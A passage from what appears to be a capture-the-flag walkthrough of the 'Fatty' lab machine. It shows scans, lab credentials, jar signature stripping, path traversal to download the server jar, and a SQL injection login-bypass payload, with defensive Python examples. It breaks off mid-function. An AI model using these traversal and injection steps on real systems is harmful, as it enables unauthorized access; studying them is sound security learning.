Basic information

Port scan

A full-port scan is needed; there are a few uncommon ports:

$ nmap -p- 10.10.10.174
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 12:17 CST
Nmap scan report for 10.10.10.174
Host is up (0.069s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
1337/tcp open waste
1338/tcp open wmc-log-svc
1339/tcp open kjtsiteserver

Nmap done: 1 IP address (1 host up) scanned in 103.34 seconds

$ nmap -sC -sV -p 21,22,1337,1338,1339 10.10.10.174
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 12:25 CST
Nmap scan report for 10.10.10.174
Host is up (0.068s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 15426727 Oct 30 2019 fatty-client.jar
| -rw-r--r-- 1 ftp ftp 526 Oct 30 2019 note.txt
| -rw-r--r-- 1 ftp ftp 426 Oct 30 2019 note2.txt
|_-rw-r--r-- 1 ftp ftp 194 Oct 30 2019 note3.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.10
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:c5:61:ba:bd:a3:e2:26:58:20:45:69:a7:58:35:08 (RSA)
|_ 256 4a:a8:aa:c6:5f:10:f0:71:8a:59:c5:3e:5f:b9:32:f7 (ED25519)
1337/tcp open ssl/waste?
| fingerprint-strings:
| GetRequest:
| dvK.
| HTTPOptions:
| *{nqfU
| B9Eq
| ~yn'
| \xf8
| RPCCheck:
| e:g@
| \x96
| 3I\x9by
| )rB#Z
| RTSPRequest:
|_ smV6:
| ssl-cert: Subject: commonName=Mr. Secure/organizationName=Fatty/stateOrProvinceName=Here/countryName=DE
| Not valid before: 2019-09-11T15:42:00
|_Not valid after: 2020-09-10T15:42:00
|_ssl-date: 2020-08-05T04:26:47+00:00; -1s from scanner time.
1338/tcp open ssl/wmc-log-svc?
| fingerprint-strings:
| GenericLines, NULL:
| #z*]T
| 2"{n
| L;8q
| GetRequest:
| =Ktk6
| RTSPRequest:
|_ \x1b
| ssl-cert: Subject: commonName=Mr. Secure/organizationName=Fatty/stateOrProvinceName=Here/countryName=DE
| Not valid before: 2019-09-11T15:42:00
|_Not valid after: 2020-09-10T15:42:00
|_ssl-date: 2020-08-05T04:26:47+00:00; -1s from scanner time.
1339/tcp open ssl/kjtsiteserver?
| fingerprint-strings:
| GenericLines, NULL:
| 'V[;
| GetRequest:
| X>_L
| HTTPOptions:
| 7,TC
| \xcf
| RPCCheck:
| SeM^
| #!1K
| RTSPRequest:
| M)V.e/
|_ dg9wm
| ssl-cert: Subject: commonName=Mr. Secure/organizationName=Fatty/stateOrProvinceName=Here/countryName=DE
| Not valid before: 2019-09-11T15:42:00
|_Not valid after: 2020-09-10T15:42:00
|_ssl-date: 2020-08-05T04:26:47+00:00; -1s from scanner time.
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1337-TCP:V=7.80%T=SSL%I=7%D=8/5%Time=5F2A34DE%P=x86_64-apple-darwin
SF:18.6.0%r(NULL,80,"\xdcd\x88\x8c\xa1\xcf\xcd\xf1r'\.\x1d'\xa09\xd6\xebi\
SF:x0e\xe2\xc2dz\xbf\x02\x9c\xa4\xe5\x80\xbcj\+\\0\xdb\xcc\xd5t\x1a\xba}\x
SF:ddm&\xc8\|Z\xbd\x99\xfff\xdc!{\x05\xfb\xc3\xc7b\xb8\x01\x01\x137\xa9R\x
SF:be\x04\x82\x1fIb\xa7\xef\x90\x85\0\xa4\x87\x95@M\xaf\xe47Z\x01\x03\x10\
SF:x80K\xcd\x07X\xfbQ8;\x929\xf8j_\xfa\x19L\x941H\xab\x8c\xaa\x99\x04\x83V
SF:B\x99A{\x9b\x06`\xcc\xdd\xd4\xc69")%r(GenericLines,80,"\xdcd\x88\x8c\xa
SF:1\xcf\xcd\xf1r'\.\x1d'\xa09\xd6\xebi\x0e\xe2\xc2dz\xbf\x02\x9c\xa4\xe5\
SF:x80\xbcj\+\\0\xdb\xcc\xd5t\x1a\xba}\xddm&\xc8\|Z\xbd\x99\xfff\xdc!{\x05
SF:\xfb\xc3\xc7b\xb8\x01\x01\x137\xa9R\xbe\x04\x82\x1fIb\xa7\xef\x90\x85\0
SF:\xa4\x87\x95@M\xaf\xe47Z\x01\x03\x10\x80K\xcd\x07X\xfbQ8;\x929\xf8j_\xf
SF:a\x19L\x941H\xab\x8c\xaa\x99\x04\x83VB\x99A{\x9b\x06`\xcc\xdd\xd4\xc69"
SF:)%r(GetRequest,80,"u8Y\xf7\xd1\x7f\xe5\x7f\x1dOO\xfe\x08h\x97\x01\xb9\x
SF:01Y\xb0m\xb3\xe4\xbc\xef\x12\xc1\xf7n>\x16\xc5\xe2z=\x07\xdc\x0c%\x08V\
SF:xdb@\xe0N\xef\0\xb7L\xacU\]\xcc\x95OO1\xea\xd2\$wC\x19#\xa6\xba\$7h\x88
SF:\x0b\xe5\x82\x83\xe2\xd4\xbd\x8a\xc3\x1d_\xab\xbf\x89\xc1\+\x1d2xq\xbf\
SF:[\x98S\xd4\xc2\xa1\x1d\xd0v\xd7\x172\xee\x15\xbaU\x03\x05\xc8\x1d\xfd\x
SF:0b:\x8c2S\)\0\x17\xca\x8c\x14\x17dvK\.")%r(HTTPOptions,80,"\*{nqfU\x98\
SF:x04\xa0\x12\$;\xc2\x9e\xee\xf3\xe9\x7f\x90\xf2:\+\xb3\)\xa7'\x9e\x03\x9
SF:9<\x1b\x1d\xbe\xa8B9Eq\xaf<\xe7\x80\x85W\xe3b\x86\x8a,\xe3\x96\x1a\x20\
SF:xde\xd7\x87Q\xcc<E\xe6\*o\x1b\x98\xf4\x93t\x11\xa9\xe0\xf6s\xcb\xa5\x80
SF:\x19\x1b\xaa\x15\x9c\n~yn'\xe0\xaa\x8e\xd6\x97\x8d\xa1#\xcb\xfe\x94\xb9
SF:l\|\x87\x0e/\xf9\x8aW\xa1\x0b\xfc\x1dn\xe5\x7f\xb5\xa5W\x88\xb1\xb3\xf3
SF:\xa2\xcf\x95\x86\\\xf8\xcb\r")%r(RTSPRequest,80,"\x1b\x836\x8e\xe3\x1a\
SF:xe2\x08\x9e\xc8\xd3\x12Y\xcd_t\xfei\x17C\xb5\xc5\xe28\xc61\x8aE\xd9\x85
SF:}H\xc8\xb4\xc6\xc7\xc6\x96\xd5\x1f\x86\x0bp\0\xbch\xdb\xd3\xc0\[\xc9-\x
SF:c0uC\x80\xf0\xc9\x04\xc2\x95;\x1cC~\xad\xf5\x020\xf5\tS\x8d\xfe\x0fVI\x
SF:bb\xd1\x13\x97o0\xeau`\x0e\x08=\xe2JJ\(\x84\xddaO\x06\xda<\x156\x01t\xa
SF:1\xbd\x02\x9d\x97N\x03UE\x82smV6:\x94\x14\x86\x06\xd2\x8c\x19\xa64")%r(
SF:RPCCheck,80,"@\xd2\xb5\x0c\xf2\x8cm\)s\xd6\|\xddgW\|\xb2\xf5\xc5\x93\(\
SF:xaei\xbc!b\x93\x13\xd8\xd9\xf7e:g@\x86\xfeB\xad\x93sL\xb5\(Ia\x86s\xe6\
SF:xae\xd2\\\x96\xb2\x9f\x9cg\xf2\x06P\xecV\xe9\x81#\)\x9c\)T\x83\xe1_p\xe
SF:8\|@\xc0tTU\x0b\x8b\xcbK\x97\x0b\x16\*\xe3\xdc\xc74\xb3\^\xa2\x1b`\xb5\
SF:xa1\x10\xf4\xbb\xdbwc\x0c\xcc3I\\\x9by\x8e\)rB#Z\xcc\xca\x05\xb7\?\)\xb
SF:1\x95\x0c\xcd\xe3");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1338-TCP:V=7.80%T=SSL%I=7%D=8/5%Time=5F2A34DE%P=x86_64-apple-darwin
SF:18.6.0%r(NULL,80,"%\xda#\x02\xac\x9d\xae\xb6\xb1#z\*\]T\x10\xe3_\"\xd2f
SF:\xc01\x922\"{n\xf6\xc7L;8q\xce-\x8f\x17o\xafY\xf1\xfb5\$\x07\xed\xcb\xb
SF:5Q\x06\xb6r\x17I}\xac\xf1\xdb'\xac\x91\xb9\x9f\xf6\xcc\r\x84\xe2\xcf>\x
SF:17\xc8\xa0\"\x01\xa1\xe4\x85\xcf\xdf\)\t\xd8Jz\x9cQ\xfdR\xe3\x82u\x93\x
SF:96\^\x8da\xf3\x96\xc2\xe2\x98O\x96Y\xf2%\xc5\xb1\x0c\x80\x02\x98=\x9f\x
SF:94\x92\xdf\xf1\xbf\|M-\xc5c\xcfr\x97")%r(GenericLines,80,"%\xda#\x02\xa
SF:c\x9d\xae\xb6\xb1#z\*\]T\x10\xe3_\"\xd2f\xc01\x922\"{n\xf6\xc7L;8q\xce-
SF:\x8f\x17o\xafY\xf1\xfb5\$\x07\xed\xcb\xb5Q\x06\xb6r\x17I}\xac\xf1\xdb'\
SF:xac\x91\xb9\x9f\xf6\xcc\r\x84\xe2\xcf>\x17\xc8\xa0\"\x01\xa1\xe4\x85\xc
SF:f\xdf\)\t\xd8Jz\x9cQ\xfdR\xe3\x82u\x93\x96\^\x8da\xf3\x96\xc2\xe2\x98O\
SF:x96Y\xf2%\xc5\xb1\x0c\x80\x02\x98=\x9f\x94\x92\xdf\xf1\xbf\|M-\xc5c\xcf
SF:r\x97")%r(GetRequest,80,"~\xf8\0\xaf\xc7\xbc\xfa\xeb\xdc\xd3:\x16w\x05\
SF:x863\[\+\xad1}\xd2\xbb\x1f\xe0-\x8a\x93/\x154u\xb9\x0b=Ktk6\x17f\x8fc\x
SF:aeW\)8\xba\xa4\x88\xad\xa3\x84&!\xc7\|1\xb1\x8du\xb0GvN\x07\x02ZJ\xa9!H
SF:\xb6W\xc3\xb6\xa9\(\xdc\]\xd5\xbc\x08\x1a\x16\xc6JU\xe6\x04\?\xe3\xfd#\
SF:x9c\x9a\x18\xc8\xa1\xffh\x1f_\xf9\xd0\?;\x1a\x03\x17\xff\xe8\xb4\r_\x8c
SF:\xb3\xf3\x04\xe1\x9fs&\x9c\xdd\x16\x92\xfe")%r(HTTPOptions,80,"\xcc\xd2
SF:\xb7\x81h\x17Nn\xc4L\x81\xf7r\xcb\x8ezy\xd9\xeaY\rA\x10c\x9b\x88\+\x04d
SF:\xb6\x1d\x05\x14{\x8e\xf5\xce\xae\xc8E\[\xcb\x90ci\x87\tDg\x93\xab'\xdc
SF:\xcev\x99\xdfe~\xd9L\xbd\xf5&=\t-\"\xae\xdb\x8c\xac\(\xea'q\x8e\xa2\xba
SF:\.t\n\xc1s\xe6\xb8\xdd\x07uV\xafk=\x0cB\xaa5s\xc0\xf4\xb0\xaa\x9aRF\$\x
SF:f7\[X\xa9\x91\xb6\xde\xa086\x8b\x92\x94\xda\xa0\x06y\x07\x97\*h\x01")%r
SF:(RTSPRequest,80,"I\x89\x15\xdc\x1d\xa3\\\x1b\x80E`\xb4\x01\x16\xa0\xce,
SF:\xccLX%\x80\x8e\x15\x15\?\xcef\x01\x1fm\x02\x9aE\xde\xba\\/\x1a\x89\xf7
SF:;\xdf\x95\xcdC\xa0\xbc\]\xcc\xdd\?w2\xc0x\xfb\xd7s\xcf\x8f\xe7f>_\xe1\x
SF:f5W\xb2\x1e\xcdc\x1b\xa9\x0f\n\xab\x9d\xcad\xc1\xb9\x8f\+\x1e\xdd\$\xad
SF:\x87\x04\$\xc2\x86W7\xe4\x84\[H\x18\xae\xb2\xbbYx\x8b\x8d\xcf\x91\xc6&\
SF:xcfv\xc6\xe16\x14\xa3\xcfW\xfa2\xdc\xb0\xb0o\xcd\x10")%r(RPCCheck,80,"\
SF:^Mw\xfc\xa4z%\x0e\xf8\xd9\xcfI\x94\x06\xa4\xee\xea4fL\xaa\x8b\x18\x06\x
SF:e7u%\t\xb6\x80\xaadY\xb2v;\xa5a\x9c\x05\]w\x8a\x8b9\xe3\xb6\xa8C\xcb\|W
SF:\x9b\xec\x0b\x0b<P\xd4\\h\x16\x0e\x1b\x01\x9d\xce\xb0\xde/\xdb\x1d\(\xd
SF:0\xf7\xf0\xd5\x81\xd9\xf6\x06T\xc0lF\t\(p\xfb\xab\xcan\xa9\xcc\xf0yJ\xd
SF:b\xa0O\xf5G\x91\xf2z\xed\xfa\xa2\xc4\xd5\x83\xc2\xb2\xfa\xd1=\x8czY\x1a
SF:E\xb3\xde\xe4a\x89\x8a\xdf");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1339-TCP:V=7.80%T=SSL%I=7%D=8/5%Time=5F2A34DE%P=x86_64-apple-darwin
SF:18.6.0%r(NULL,80,"\xfa!\xb47\x9d\xb8\x9e\"\xe1\xe5\xaapi-\xe1\x1eT\x96w
SF:\x86\x93\xba\x9caf\xb4\xe6\xcf\xcf\xa6zS\xdf\x1d\x96\xcb'V\[;\xe2\['\x1
SF:4\+\xe8\xc3\x8a\x9cC\xbcp\x03\xd2\\'vF\x83\xbdv\x1f\$N\xfdL\x99\x8a\x87
SF:@3{\xfb4b\r\x9f_\x97X\xa5{\xc7\xe0_\xc6HV\xa7\xf5d@\xae\xdat\x03\xb6\x1
SF:d\xd0\x92b\x83\x7f\xcby\xf6\+3\xd1L\xabn\0\xddR\xd5\xd0\xb9\xf6\xc9\x9f
SF:0\x96\x0e=O\x90\x8b")%r(GenericLines,80,"\xfa!\xb47\x9d\xb8\x9e\"\xe1\x
SF:e5\xaapi-\xe1\x1eT\x96w\x86\x93\xba\x9caf\xb4\xe6\xcf\xcf\xa6zS\xdf\x1d
SF:\x96\xcb'V\[;\xe2\['\x14\+\xe8\xc3\x8a\x9cC\xbcp\x03\xd2\\'vF\x83\xbdv\
SF:x1f\$N\xfdL\x99\x8a\x87@3{\xfb4b\r\x9f_\x97X\xa5{\xc7\xe0_\xc6HV\xa7\xf
SF:5d@\xae\xdat\x03\xb6\x1d\xd0\x92b\x83\x7f\xcby\xf6\+3\xd1L\xabn\0\xddR\
SF:xd5\xd0\xb9\xf6\xc9\x9f0\x96\x0e=O\x90\x8b")%r(GetRequest,80,"\xfe\x03\
SF:x87-\^\xe3\xec\x80\xc2\xce7g\xdd\xcc\x0f\xfeQE6\xd8\xd6\xd1b\x93\xef\[>
SF:1\xc0\xcd\x1ct\xf5\x0b\xd2R\xfa\xd6\x9f\x17\x9f\x0et\xab\x9a`M\x98`=k\x
SF:de\xcd\xbe\xee\x1f\x93\x07\xe1\*\x86\x14\x07\x14X>_L\xc3\x8c~\xe1T\xe1\
SF:x9b\0\xce\xac\x04\xfb\xa7\xfc\xfd\xe8\xe0\xd2M\xe3\x85\x881\xf8\xd3\xd4
SF:uY\xb6{\x01\xd4\xb9=f\x87\x91\xf5\xccEG\xbb5\*>\xf1!\xd4\x89\xb5%\x94\x
SF:18\x92\x17\xdfH\xfe\xc4v")%r(HTTPOptions,80,"\xe4\x8d7,TC\xa1\x8f\x10\x
SF:85\x94\xd4hY\x9a\x84\xc3R\^\xf8\xe6\x9f:\xa2JQ\x0c\xd1\xc6\x1e\x8c\xff\
SF:xf3\x9c\x9fZ\xd9b\x1a\xda\x07\xc7\xaf\xbddO\x17\xe0\xd9\xcc\xfe\xc2\x0b
SF:\xae\xf6\xc4\x12=\xd4\x05\xc2\x93\xa2\x16\x9b>u\x94\xdd\x08\xed\xed\xb3
SF:{\xa7\xe3=\r\x89\x0fBe\x86\xc7:\xae\xc7\x1a\xb8\xf8C\xe8\xf3\x9f\\\xcf\
SF:xdb\x9a\x8a\r@\x8c\x99\x8b\"\xa6#8\t!9~\x80\xdc\xc8\xa7\xf6n\x81\n\x18j
SF:w\xf2\x17\xe7>\xc4")%r(RTSPRequest,80,"#V\xa5\xb4\x03\xe1>\x9b\x82\xc7V
SF:\x01G\x1d\xa3\xecm\]\x12N}\x96\xa0xH\xdb\)d\x86i\xe7\^\0\x0bx\xe5\(\xcb
SF:\xf0\x18\xc9\x1c\x94\x91\xaaM\)V\.e/\x8f\xca\xb7\x18\xb5\xde\x04\x1a\x0
SF:8\[\x88\xd5\xc2\x0f\xb5dg9wm\xb1\xcb\xba\xa1\xcf6zU\xfc\xe92\xa8\x8bR\x
SF:18\xf0\n\x1a\xf2\xd8\x86\x1e\xd7\xd9{\xde\xa4\xda\xa1>l\x14E\xef2\x1b\x
SF:9d\x9e\xd3\^\x10\|\x8a\x1e\x112\xb0\xa6\xda\xd0!\xb7E\xad8T\xbf")%r(RPC
SF:Check,80,"\(\xae`\r5\x88\x9d@F\xa0\xe6\x85\x9fSeM\^\x17\xb6e\xd1/\xbc\x
SF:e8A\xcd\xa4\x10\n\x05\x0fT\xdc\xa1\xb1q\x91\xa9\xf5`\xc2`\x90W\x19\x8c\
SF:x0eVI\x86\x80\x12\xd4\x1cK\xfc\xe4\xadfS\xf7,\xf3\xdc\xa5t\xce\x9df\x91
SF:I\xb4\xc8F\xac\xa6b\x89\xea\xe9\xf5\xafq\xf3\x13\xa1\x1bP\x18\xe0#!1K\x
SF:c6M\x96\xe9\xf9\xcd\xc7\xe3\xb0\*\xe5\x8c\x12\xc6\xda\xef\xc2\xe9\x965\
SF:x98\x9fW\xc3\xf9\x0fEgn\x17iy\0\xc3");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.67 seconds

21

FTP allows anonymous login and holds a few files; download them:

➜  Fatty ftp 10.10.10.174
Connected to 10.10.10.174.
220 qtc's development server
Name (10.10.10.174:miao): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote pasv
227 Entering Passive Mode (10,10,10,174,185,136).
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,10,174,187,39).
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 15426727 Oct 30 2019 fatty-client.jar
-rw-r--r-- 1 ftp ftp 526 Oct 30 2019 note.txt
-rw-r--r-- 1 ftp ftp 426 Oct 30 2019 note2.txt
-rw-r--r-- 1 ftp ftp 194 Oct 30 2019 note3.txt
226 Directory send OK.
ftp> get *
local: * remote: *
227 Entering Passive Mode (10,10,10,174,193,90).
550 Failed to open file.
ftp> mget *
mget fatty-client.jar?
227 Entering Passive Mode (10,10,10,174,179,171).
150 Opening BINARY mode data connection for fatty-client.jar (15426727 bytes).
226 Transfer complete.
15426727 bytes received in 23.40 secs (643.7956 kB/s)
mget note.txt?
227 Entering Passive Mode (10,10,10,174,179,86).
150 Opening BINARY mode data connection for note.txt (526 bytes).
226 Transfer complete.
526 bytes received in 0.00 secs (3.1549 MB/s)
mget note2.txt?
227 Entering Passive Mode (10,10,10,174,179,254).
150 Opening BINARY mode data connection for note2.txt (426 bytes).
226 Transfer complete.
426 bytes received in 0.00 secs (308.3882 kB/s)
mget note3.txt?
227 Entering Passive Mode (10,10,10,174,162,237).
150 Opening BINARY mode data connection for note3.txt (194 bytes).
226 Transfer complete.
194 bytes received in 0.00 secs (142.7680 kB/s)
ftp>

Three txt files and one jar file:

The jar is presumably a client for one of the services. According to the notes, that service used to listen on port 8000 and has been moved to port 1337; the notes also mention a runtime-environment problem and give a set of credentials:

User: qtc
Pass: clarabibi

fatty-client.jar

Proxy connection

Running it directly fails to connect:

From the information above, and from reading the decompiled code, we know the client is configured for port 8000 while the service now listens on 1337, so we need some way to forward the connection (or modify the code and repackage, which means dealing with the signature check):

Here a forwarder such as simpleproxy can be used, together with a hosts entry pointing the client's hostname at the forwarder:

simpleproxy -L 8000 -R 10.10.10.174:1337

# hosts
10.211.55.12 server.fatty.htb

Then the login succeeds:

Modify and repackage

If you decompile, modify and repackage directly, you run into a signature check:

Repackage after modifying:

jar -cmf META-INF/MANIFEST.MF ../new.jar *

Running and logging in produces the error above: the jar is verified, and the modified beans.xml no longer matches the digest recorded for it: SHA-256 digest error for beans.xml

The fix is simply to delete META-INF/1.RSA and META-INF/1.SF before packaging; with no signature files present the jar is treated as unsigned and the per-entry digests are no longer checked:
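To make that digest check concrete, here is an added Python example (not code from the original writeup or from the Fatty client) that reproduces it on a constructed toy jar: a manifest carrying a SHA-256-Digest for beans.xml plus dummy 1.SF/1.RSA entries. The beans.xml contents and its host/port attributes are assumptions for the demo. `digest_errors` performs the same per-entry comparison the JVM's jar verifier does before it reports "SHA-256 digest error", and `rewrite_jar(..., strip_signature=True)` is the zip -d step: once no .SF/.RSA entry is present the jar counts as unsigned and the stale digests left in MANIFEST.MF are ignored.

```python
import base64
import hashlib
import io
import zipfile

SIGNATURE_SUFFIXES = (".SF", ".RSA", ".DSA", ".EC")


def _unfold(manifest_text):
    """Join manifest continuation lines (a leading space continues the previous line)."""
    lines = []
    for line in manifest_text.splitlines():
        if line.startswith(" ") and lines:
            lines[-1] += line[1:]
        else:
            lines.append(line)
    return lines


def manifest_digests(manifest_text):
    """Per-entry SHA-256-Digest values from MANIFEST.MF, keyed by entry name."""
    digests, name = {}, None
    for line in _unfold(manifest_text):
        if line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA-256-Digest: ") and name is not None:
            digests[name] = line[len("SHA-256-Digest: "):]
        elif line == "":
            name = None
    return digests


def is_signed(jar_bytes):
    """A jar is signed when META-INF holds a signature file (.SF) and its signature block (.RSA/.DSA/.EC)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return any(n.startswith("META-INF/") and n.upper().endswith(SIGNATURE_SUFFIXES)
                   for n in zf.namelist())


def digest_errors(jar_bytes):
    """Entries whose content no longer matches the manifest digest, i.e. what triggers
    'SHA-256 digest error for beans.xml'. An unsigned jar is not verified at all."""
    if not is_signed(jar_bytes):
        return []
    bad = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        expected = manifest_digests(zf.read("META-INF/MANIFEST.MF").decode("utf-8"))
        for name, digest in expected.items():
            actual = base64.b64encode(hashlib.sha256(zf.read(name)).digest()).decode("ascii")
            if actual != digest:
                bad.append(name)
    return bad


def rewrite_jar(jar_bytes, replace=None, strip_signature=False):
    """Copy a jar, optionally replacing entries ({name: bytes}) and/or dropping the signature
    files: the effect of `zip -d fatty-client.jar META-INF/1.RSA META-INF/1.SF` plus `zip -ur`."""
    replace = replace or {}
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            name = info.filename
            if strip_signature and name.startswith("META-INF/") and name.upper().endswith(SIGNATURE_SUFFIXES):
                continue
            dst.writestr(name, replace.get(name, src.read(name)))
    return out.getvalue()


def build_sample_jar():
    """Constructed toy 'signed' jar standing in for fatty-client.jar: a manifest carrying a
    digest for beans.xml plus dummy 1.SF/1.RSA entries (not a real signature block)."""
    beans = b"<beans><bean id='server' host='server.fatty.htb' port='8000'/></beans>"  # assumed content
    digest = base64.b64encode(hashlib.sha256(beans).digest()).decode("ascii")
    manifest = ("Manifest-Version: 1.0\r\n\r\n"
                "Name: beans.xml\r\nSHA-256-Digest: " + digest + "\r\n\r\n")
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        zf.writestr("META-INF/1.SF", "Signature-Version: 1.0\r\n")
        zf.writestr("META-INF/1.RSA", b"placeholder, not a PKCS#7 signature")
        zf.writestr("beans.xml", beans)
    return out.getvalue()


def demo():
    """Original -> patched beans.xml (digest now wrong) -> signature stripped (no longer verified)."""
    original = build_sample_jar()
    patched = rewrite_jar(original, replace={
        "beans.xml": b"<beans><bean id='server' host='server.fatty.htb' port='1337'/></beans>"})
    unsigned = rewrite_jar(patched, strip_signature=True)
    return digest_errors(original), digest_errors(patched), digest_errors(unsigned), is_signed(unsigned)
```

A stripped jar still carries the old Name/SHA-256-Digest sections in its manifest; they are harmless because the verifier only runs for signed jars, but a cleaner repackage can also cut the manifest down to its main section.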

File browsing

There is a file-browsing feature restricted to a fixed directory; from the error message we get the base path: /opt/fatty/files/


Decompiling shows this feature is implemented in Invoker's showFile method, which takes the folder as a parameter and calls sendAndRecv

The directory names are defined in ClientGuiTest; if we change them we can list files in other directories:

For example, change the config directory to .. to view the files in the parent directory
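The server-side check that is missing here is easy to model. The following is an added Python example, not code from the writeup or from the Fatty server: `showfile_unchecked` joins the client-supplied folder onto the base path, which is what the behaviour above suggests the server does, and `showfile_checked` is the fix. The folder and file names are hypothetical.

```python
import os

FILES_ROOT = "/opt/fatty/files"  # base path recovered from the server's error message


def showfile_unchecked(root, folder, name):
    """Model of what the server appears to do: trust the folder name the client sends and join it
    onto the root. '..' climbs out of root, and an absolute folder discards the root entirely
    because os.path.join restarts at an absolute component."""
    return os.path.normpath(os.path.join(root, folder, name))


def showfile_checked(root, folder, name):
    """Hardened lookup: resolve the requested path (realpath also collapses symlinks planted under
    the root) and refuse anything that is not strictly inside root. Returns None when rejected."""
    base = os.path.realpath(root)
    target = os.path.realpath(os.path.join(base, folder, name))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target
```

The unchecked variant is exactly why editing the folder constants in ClientGuiTest is enough: the client-side list of allowed folders is a UI convenience, not a security boundary.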

Below, the Java source decompiled by jd-gui is modified directly and the recompiled classes are patched into the original jar:

zip -d fatty-client.jar META-INF/1.RSA META-INF/1.SF
zip -ur fatty-client.jar .

javac -cp ../fatty-client.jar htb/fatty/client/gui/ClientGuiTest.java
mkdir raw
cp fatty-client.jar raw/fatty-client.jar
cd raw && unzip fatty-client.jar
cd .. && mv htb/fatty/client/gui/*.class raw/htb/fatty/client/gui/
cd raw && jar -cmf META-INF/MANIFEST.MF traverse.jar .
java -jar traverse.jar

Then a fatty-server.jar file turns up:

start.sh

#!/bin/sh

# Unfortunately alpine docker containers seems to have problems with services.
# I tried both, ssh and cron to start via openrc, but non of them worked. Therefore,
# both services are now started as part of the docker startup script.


# Start cron service
crond -b

# Start ssh server
/usr/sbin/sshd

# Start Java application server
su - qtc /bin/sh -c "java -jar /opt/fatty/fatty-server.jar"

fatty-server.jar

Download the file

Here we modify the open method so that it writes the raw response bytes to disk, which lets us download fatty-server.jar:

import java.io.FileOutputStream;
...

if (this.response.hasError()) {
    return "Error: Your action caused an error on the application server!";
}
String response = "";
try {
    response = this.response.getContentAsString();
} catch (Exception e) {
    response = "Unable to convert byte[] to String. Did you read in a binary file?";
}
// The jar is binary, so the string conversion above fails; dump the raw bytes instead.
try (FileOutputStream fos = new FileOutputStream("/tmp/fatty-server.jar")) {
    fos.write(this.response.getContent());
}
return response;

...

Repackage and run again; the download yields fatty-server.jar:

Decompile

Decompile it the same way; checkLogin(User user) in FattyDbSession.java has a SQL injection:

It is the username field of the client login that is injectable

User

htb/fatty/client/shared/resources/user.java shows how the password is hashed; the username is not processed at all:

public User(int uid, String username, String password, String email, Role role) {
    this.uid = uid;
    this.username = username;
    // Password is hashed client-side as SHA-256(username + password + fixed salt), hex-encoded.
    String hashString = this.username + password + "clarabibimakeseverythingsecure";
    MessageDigest digest = null;
    try {
        digest = MessageDigest.getInstance("SHA-256");
    } catch (NoSuchAlgorithmException e) {
        e.printStackTrace();
    }
    byte[] hash = digest.digest(hashString.getBytes(StandardCharsets.UTF_8));
    this.password = DatatypeConverter.printHexBinary(hash);
    this.email = email;
    this.role = role;
}

Injection

It is basically a matter of reading the code and constructing the injection; the client also needs a small modification to make this convenient. Keep in mind that the client hashes username + password + salt, and the username is the whole injected string, so the server presumably compares the password column of the returned row against a hash that covers the payload itself. The matching plain 'abc' in the Password field and in the password column of the UNION row below therefore works only if the client is patched to send the password unhashed (a hash of the injected username cannot be embedded inside the very string it hashes):

Then use:

Username : abc' UNION SELECT 1,'abc','a@b.com','abc','admin
Password : abc

The resulting SQL is:

SELECT id,username,email,password,role FROM users WHERE username='abc' UNION SELECT 1,'abc','a@b.com','abc','admin

With that we can log in as a forged admin:
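As an added example (not from the original writeup or from the Fatty server, whose checkLogin code is not shown here), the following Python models the login against an in-memory SQLite table with the column order from the SELECT above. `client_hash` mirrors the User constructor, `vulnerable_check_login` concatenates the username the way the page's SQL shows and then compares the password column with what the client sent (an assumption about how the server compares), and `safe_check_login` uses a bound parameter. The qtc row's email and role are made up for the demo. It also shows why the client needs patching: an unpatched client hashes the whole injected username, so the value it sends can never equal the 'abc' sitting inside the payload it hashed.

```python
import hashlib
import sqlite3

SALT = "clarabibimakeseverythingsecure"  # the constant from User.java above


def client_hash(username, password):
    """Mirror of the client's User constructor: SHA-256(username + password + salt) as
    upper-case hex, which is what DatatypeConverter.printHexBinary produces."""
    return hashlib.sha256((username + password + SALT).encode("utf-8")).hexdigest().upper()


def make_users_db():
    """Constructed stand-in for the server's users table. The column list comes from the SELECT
    on this page; the qtc row's email and role are invented for the demo."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT, password TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'qtc', 'qtc@fatty.htb', ?, 'user')",
               (client_hash("qtc", "clarabibi"),))
    return db


def vulnerable_check_login(db, username, sent_password):
    """Model of checkLogin as described above: the username is concatenated straight into the
    query, and the password column of the returned row is compared with what the client sent
    (assumed). Returns the role on success, None on failure."""
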